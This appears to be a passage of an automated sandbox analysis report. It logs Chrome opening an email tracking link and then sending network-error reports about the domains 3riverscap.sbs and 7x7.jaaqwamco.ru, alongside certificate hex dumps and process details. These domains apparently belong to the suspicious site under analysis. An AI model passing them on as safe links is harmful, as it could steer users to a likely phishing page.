                                                                              Data Ascii: MSCF+D[I+IdrMenvironment.cabQ!+rMCK|XTCI7AR$C$DRA:T.og>sz><JRA%} 0\ez@{,/:9:X8s^
                                                                              2024-11-26 19:55:13 UTC14181INData Raw: 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 26 30 24 06 03 55 04 03 13 1d 4d 69 63 72 6f 73 6f 66 74 20 54 69 6d 65 2d 53 74 61 6d 70 20 50 43 41 20 32 30 31 30 30 1e 17 0d 32 33 31 30 31 32 31 39 30 37 32 35 5a 17 0d 32 35 30 31 31 30 31 39 30 37 32 35 5a 30 81 d2 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 2d 30 2b 06 03 55 04 0b 13 24 4d 69 63 72 6f
                                                                              Data Ascii: UUS10UWashington10URedmond10UMicrosoft Corporation1&0$UMicrosoft Time-Stamp PCA 20100231012190725Z250110190725Z010UUS10UWashington10URedmond10UMicrosoft Corporation1-0+U$Micro


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              42192.168.2.164978035.190.80.14436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:55:31 UTC545OUTOPTIONS /report/v4?s=EhJ8uA%2B05xg77Cuv5PIyJjys5ieokbM9QK7zd7ZqM6PZ8N96UGot3IM6R%2BarFu8Esxi3K%2BTF7MdMZXJlH76ftTI%2B4GMoOA%2F%2F4pgStl1ZF5enITVZcwGQB5UYr5qU%2BtQZNQ%3D%3D HTTP/1.1
                                                                              Host: a.nel.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Origin: https://3riverscap.sbs
                                                                              Access-Control-Request-Method: POST
                                                                              Access-Control-Request-Headers: content-type
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:55:32 UTC336INHTTP/1.1 200 OK
                                                                              Content-Length: 0
                                                                              access-control-max-age: 86400
                                                                              access-control-allow-methods: OPTIONS, POST
                                                                              access-control-allow-origin: *
                                                                              access-control-allow-headers: content-type, content-length
                                                                              date: Tue, 26 Nov 2024 19:55:31 GMT
                                                                              Via: 1.1 google
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              43192.168.2.164978135.190.80.14436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:55:31 UTC535OUTOPTIONS /report/v4?s=GrEtKVGQwjzk%2BBxci6cI337FKcg7z1h%2B6pzs76O5RZkAT8L2j3orsvLARkBEovfpGzetT8Lh9UtiOZeWhQ6vGUgvBi6JAJqCAqFSEgnq17GGqIGn%2FYUbrOrrIyJiIQ%3D%3D HTTP/1.1
                                                                              Host: a.nel.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Origin: https://7x7.jaaqwamco.ru
                                                                              Access-Control-Request-Method: POST
                                                                              Access-Control-Request-Headers: content-type
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:55:32 UTC336INHTTP/1.1 200 OK
                                                                              Content-Length: 0
                                                                              access-control-max-age: 86400
                                                                              access-control-allow-methods: POST, OPTIONS
                                                                              access-control-allow-origin: *
                                                                              access-control-allow-headers: content-type, content-length
                                                                              date: Tue, 26 Nov 2024 19:55:31 GMT
                                                                              Via: 1.1 google
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              44192.168.2.164978235.190.80.14436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:55:31 UTC543OUTOPTIONS /report/v4?s=%2FJj3BHS6BdRRwSol2VxrGNHdB1ar43mO%2FviGjuRVKJa6l9ZNtA7Wd5v6lAg6jlIK8TBYxsFYNMonVnTxuHvrO1%2FkhXf05uAJmMVsaml%2B4%2FImZPpZr%2BIYwICxCItEmJkC3Q%3D%3D HTTP/1.1
                                                                              Host: a.nel.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Origin: https://3riverscap.sbs
                                                                              Access-Control-Request-Method: POST
                                                                              Access-Control-Request-Headers: content-type
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:55:32 UTC336INHTTP/1.1 200 OK
                                                                              Content-Length: 0
                                                                              access-control-max-age: 86400
                                                                              access-control-allow-methods: OPTIONS, POST
                                                                              access-control-allow-origin: *
                                                                              access-control-allow-headers: content-length, content-type
                                                                              date: Tue, 26 Nov 2024 19:55:31 GMT
                                                                              Via: 1.1 google
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              45192.168.2.164978335.190.80.14436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:55:33 UTC488OUTPOST /report/v4?s=EhJ8uA%2B05xg77Cuv5PIyJjys5ieokbM9QK7zd7ZqM6PZ8N96UGot3IM6R%2BarFu8Esxi3K%2BTF7MdMZXJlH76ftTI%2B4GMoOA%2F%2F4pgStl1ZF5enITVZcwGQB5UYr5qU%2BtQZNQ%3D%3D HTTP/1.1
                                                                              Host: a.nel.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 425
                                                                              Content-Type: application/reports+json
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:55:33 UTC425OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 35 39 37 32 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 33 2c 22 6d 65 74 68 6f 64 22 3a 22 50 4f 53 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 30 2c 22 74 79 70 65 22 3a 22 61 62 61 6e 64 6f 6e 65 64 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 33 72 69 76 65 72 73 63 61 70 2e 73 62 73 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c
                                                                              Data Ascii: [{"age":55972,"body":{"elapsed_time":63,"method":"POST","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"","status_code":0,"type":"abandoned"},"type":"network-error","url":"https://3riverscap.sbs/cdn-cgi/chall
                                                                              2024-11-26 19:55:33 UTC168INHTTP/1.1 200 OK
                                                                              Content-Length: 0
                                                                              date: Tue, 26 Nov 2024 19:55:33 GMT
                                                                              Via: 1.1 google
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              46192.168.2.164978435.190.80.14436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:55:33 UTC476OUTPOST /report/v4?s=GrEtKVGQwjzk%2BBxci6cI337FKcg7z1h%2B6pzs76O5RZkAT8L2j3orsvLARkBEovfpGzetT8Lh9UtiOZeWhQ6vGUgvBi6JAJqCAqFSEgnq17GGqIGn%2FYUbrOrrIyJiIQ%3D%3D HTTP/1.1
                                                                              Host: a.nel.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 435
                                                                              Content-Type: application/reports+json
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:55:33 UTC435OUTData Raw: 5b 7b 22 61 67 65 22 3a 34 33 30 33 35 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 35 30 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 37 78 37 2e 6a 61 61 71 77 61 6d 63 6f 2e 72 75 2f 53 62 33 4f 45 63 75 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 37 2e 31 38 30 2e 31 39 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d
                                                                              Data Ascii: [{"age":43035,"body":{"elapsed_time":350,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://7x7.jaaqwamco.ru/Sb3OEcu/","sampling_fraction":1.0,"server_ip":"172.67.180.192","status_code":404,"type":"http.error"},"type":"network-
                                                                              2024-11-26 19:55:33 UTC168INHTTP/1.1 200 OK
                                                                              Content-Length: 0
                                                                              date: Tue, 26 Nov 2024 19:55:33 GMT
                                                                              Via: 1.1 google
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              47192.168.2.164978535.190.80.14436956C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-11-26 19:55:33 UTC486OUTPOST /report/v4?s=%2FJj3BHS6BdRRwSol2VxrGNHdB1ar43mO%2FviGjuRVKJa6l9ZNtA7Wd5v6lAg6jlIK8TBYxsFYNMonVnTxuHvrO1%2FkhXf05uAJmMVsaml%2B4%2FImZPpZr%2BIYwICxCItEmJkC3Q%3D%3D HTTP/1.1
                                                                              Host: a.nel.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 441
                                                                              Content-Type: application/reports+json
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-11-26 19:55:33 UTC441OUTData Raw: 5b 7b 22 61 67 65 22 3a 35 30 39 37 36 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 33 32 30 37 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 37 32 2e 36 36 2e 30 2e 31 35 38 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 35 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 33 72 69 76 65 72 73 63 61 70 2e 73
                                                                              Data Ascii: [{"age":50976,"body":{"elapsed_time":3207,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"172.66.0.158","status_code":405,"type":"http.error"},"type":"network-error","url":"https://3riverscap.s
                                                                              2024-11-26 19:55:33 UTC168INHTTP/1.1 200 OK
                                                                              Content-Length: 0
                                                                              date: Tue, 26 Nov 2024 19:55:33 GMT
                                                                              Via: 1.1 google
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:14:54:21
                                                                              Start date:26/11/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                              Imagebase:0x7ff7f9810000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:1
                                                                              Start time:14:54:22
                                                                              Start date:26/11/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=1976,i,15468630849517401566,4594453010131145192,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                              Imagebase:0x7ff7f9810000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:false

                                                                              Target ID:3
                                                                              Start time:14:54:23
                                                                              Start date:26/11/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "https://link.mail.beehiiv.com/ls/click?upn=u001.KDDa4SKH91gcnCIm13FUDjBk8DnozwkSdxe-2BLMCJAa8TiKDhd-2B38pl782PnlKrmgzQTjD8fATdnwc5QgneqdUjWYx5D82QC2JajKOD5dhwQf6nBS9x6PxACdxqZ-2BVvfXSFr536dEl71Z4-2B0lKXrlBq2I7OGOUfe9d0qU6CGc-2Fmfk3q0WwhO42BOQi8aYKh6VoV-2Fvh8sTRNP-2FzICpX0YMfHxlEW7fbg9SV-2BZbNdkv2-2Fpl72tpteDYdTlwajVUY00F0PHA_ZF37BJsSpeg2ggKro0Kw1JZi2Q7X5lMR4GcQUR-2F5GPPdktqhJXeC-2Bsy71uIylML6XXkLS1FYaxFM495ZF5HfT0kw37Vy5JEgIau55HagsDPP2WniEKQdRVUyQJDaH4w-2F2p6KuwGHUKUEB38nhc92t8hXLjbu-2FxKQqxpAf-2FIB1EdEcuDPVgMcwWoZKV6-2FqV3HrDnxqjceVv4CXxtjZ2JkO-2FUQ9O68DpCM-2F5dMvT-2FayKu2U6pF5JC6uPW18Z2ptqBTGPNdoimmFZuTI-2BzLIJuacRYcsFhvk-2FwCd5-2FfgR9VaRTivmwUCmaQtKoAP0BOnzwqcmyDGFhpcYOdxVqyJWSy-2B743S17rkeGe7waWwJLboNXwyMd-2B9s8I3MOfBk2TtelNM0qBGTIKvZZMmOPaGvvxbvCz8i7Yz-2FsuCfpo46vACb3GxE1l0-2FAMv8NYCoN3rK-2Bb"
                                                                              Imagebase:0x7ff7f9810000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              No disassembly